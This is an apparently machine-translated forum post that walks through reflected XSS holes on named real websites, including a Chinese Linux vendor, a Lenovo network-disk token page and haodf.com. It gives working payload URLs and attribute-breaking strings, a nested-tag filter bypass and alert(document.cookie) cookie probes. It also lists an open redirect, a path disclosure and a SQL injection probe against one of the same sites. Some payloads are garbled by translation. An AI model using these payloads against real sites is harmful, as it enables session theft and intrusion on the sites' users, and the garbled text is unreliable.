Two winning software xss (detailed analysis)

Author: Enter www.anying.org to repost, which must be noted

Dig a few xss posts.
The software xss won the bid (Sister's linux was developed by China .. The website is not secure)
1: http://www.cs2c.com.cn/search.php? Searchword = <iframe src = http://www.baidu.com> & submit = +
Enter a self-constructed feature character on the page.

 

<TR> <TD align = left style = "font-size: 14px; font-weight: bold; text-align: center; border-bottom: 1px dashed # ccc; "> Search <span style =" color: # FF0000 "> aaaaaaaaaaaa </span> for the following information: </TD> </TR>

Look... Aaaaaaaa is output
Let's try to see if there is any filtering.

<TR> <TD align = left style = "font-size: 14px; font-weight: bold; text-align: center; border-bottom: 1px dashed # ccc; "> Search <span style =" color: # FF0000 "> <>! @ # $ % ^ & * () </Span> The following information is found: </TD> </TR>

Look .. No Filtering
You can enter xss Code directly.

2:

Http://neocertify.cs2c.com.cn/display/webSoftIndex.do? ChannelId = 71
Let's look at the source code of what we can change.
 

<form id="myForm" action="/display/webQueryCompatible.do"><input type="hidden" id="keyword" name="keyword" value="aaaaaaaaaaa" /><input type="hidden" id="companyId" name="companyId" value="" />

Look !!! Aaaaaaaaaa .. But in <input> .. Value is the displayed content .. Think about it .. What if we enter "/>?
Binge !..
By the way ..
Of course, we closed the <input> tag,
So what?
The xss Code Constructed later will be executed as normal html code.
Enter in the search box
"/> <Iframe src = http://www.baidu.com>
"/> <Script> alert (document. cookie) </script>



Exposed path of the winning Software
Http://www.cs2c.com.cn/index.php? Id = 117% 20-1

I won't talk about the path.

Lenovo Enterprise Network Disk reflective xss
Https://token.vips100.com/checkAccessCode.php? Code = % 22/% 3E <iframe % 20src = http://www.baidu.com> & sec = true
Old method .. Search for a string of aaaaaaaaa source code
  < input  type = "hidden"  name = "code"  value = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" />                           < input  type = "hidden"  name = "sec"  value = "" />
How is it?
Look .. Very familiar ..
Okay .. We close the label
Enter "/>

We can see that a string of aaa has been output.
We enter <script>
Why ..
Our <script> seems to be filtered
 
< input  type = "hidden"  name = "code"  value = ""  />"/>  < input  type = "hidden"  name = "sec"  value = "" />
In fact, don't be in a hurry .. We can bypass this after constructing it.
Let's enter <scr <script> ipt> to see
View < input  type = "hidden"  name = "code"  value = ""  />< script >"/>                          < input  type = "hidden"  name = "sec"  value = "" />
Okay. Try a cookie.
Enter "/> <scr <script> ipte> alert (document. cookie) </SC <script> rept> //

Try iframe


Good doctor url jump
Http://www.haodf.com/msg.php? Msg = & url = http://www.baidu.com

Good doctor xss
Http://www.haodf.com/msg.php? Msg = <script> alert (document. cookie) </script>
This xss does not have any filtering ..
Enter the xss Code directly.


Add one
An SQL injection is found when the target xss is verified.
Http://neocertify.cs2c.com.cn/di... d = 100 & newsId = 36
And 1 = 1 And 1 = 2
But I did not expose the table .. I don't know why .. Maybe the dictionary is not powerful enough.